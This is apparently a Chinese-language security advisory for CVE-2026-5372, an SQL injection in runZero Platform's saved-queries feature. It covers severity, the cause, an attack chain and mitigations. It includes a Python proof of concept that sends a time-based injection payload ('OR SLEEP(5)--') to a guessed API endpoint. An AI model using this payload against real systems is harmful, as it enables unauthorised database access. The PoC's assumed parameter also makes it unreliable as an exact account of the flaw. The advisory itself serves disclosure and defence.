CVE-2026-5372 CVSS 6.4 中危

CVE-2026-5372: runZero平台SQL注入漏洞

披露日期: 2026-04-07

来源: 44488dab-36db-4358-99f9-bc116477f914

漏洞信息

漏洞编号

CVE-2026-5372

漏洞类型

SQL注入

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

runZero Platform

漏洞概述

runZero Platform是一款网络资产发现工具，其在4.0.260123.0及后续版本中存在一处SQL注入安全漏洞。该漏洞源于“已保存查询”功能未能正确处理用户输入，导致攻击者可以注入恶意的SQL命令。根据CVSS v3.1标准，该漏洞评分为6.4分，属于中危级别。利用此漏洞需要攻击者已获得高权限账号，并诱导用户进行界面交互。尽管利用门槛较高，但成功攻击可能导致数据库中的敏感信息泄露、数据完整性受损以及服务不可用。官方已确认此问题并在版本4.0.260123.1中完成了修复。

技术细节

该漏洞的核心原理在于runZero平台在处理“已保存查询”相关参数时，未对输入数据进行严格的类型检查或特殊字符转义，从而触发了CWE-89（SQL命令中特殊元素的中和不当）。由于CVSS向量显示PR:H（高权限）和UI:R（需用户交互），这通常意味着漏洞存在于管理员后台或需要特定操作触发。攻击者首先需要拥有平台的高级权限，然后构造包含SQL注入语法的Payload，并通过保存查询功能的接口提交。当系统解析并执行该查询时，恶意代码会被传递给后端数据库。攻击者可以利用UNION查询或盲注技术获取敏感凭证或修改关键数据。由于攻击复杂度为高（AC:H），且需要用户交互，这降低了被自动化大规模利用的风险，但对内网高权限用户仍是严重威胁。

攻击链分析

STEP 1

侦察与认证

攻击者侦察目标网络，确认运行了runZero Platform，并获取高权限账号（管理员）的凭证。

STEP 2

构造Payload

攻击者针对“已保存查询”功能构造包含SQL注入语段的恶意数据包。

STEP 3

提交与交互

攻击者利用高权限会话提交恶意查询，或诱导管理员在界面上执行包含恶意代码的操作（UI:R）。

STEP 4

执行注入

后端数据库解析并执行注入的SQL语句，可能导致数据泄露或篡改。

STEP 5

维持权限

利用获取的数据进一步横向移动或维持对系统的控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: runZero Platform Saved Queries SQL Injection PoC
# Date: 2026-04-07
# Exploit Author: Analyst
# Vendor Homepage: https://www.runzero.com/
# Version: 4.0.260123.0
# CVE: CVE-2026-5372

def exploit_sqli(target_url, admin_cookie):
    """
    This PoC demonstrates the SQL injection vulnerability in saved queries.
    It requires a high-privileged session cookie.
    """
    headers = {
        "Cookie": admin_cookie,
        "Content-Type": "application/json"
    }
    
    # Malicious payload to test SQL injection (Time-based)
    # Assuming the vulnerable parameter is 'query_name' or similar within the saved query object
    payload = {
        "name": "Test Query' OR SLEEP(5)--",
        "query": "SELECT * FROM assets"
    }
    
    try:
        response = requests.post(f"{target_url}/api/v1.0/saved_queries", json=payload, headers=headers, timeout=10)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed: Database delay detected.")
        else:
            print("[-] Vulnerability not detected or request failed.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target and credentials
    target = "http://runzero-target:3000"
    cookie = "session_id=high_privileged_session_token"
    exploit_sqli(target, cookie)

影响范围

runZero Platform 4.0.260123.0

防御指南

临时缓解措施

在未升级之前，建议严格限制管理员账户的使用，并对系统中的“已保存查询”列表进行安全审计，删除来源不明或异常的查询条目。同时，监控数据库日志是否存在异常的SQL查询活动。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表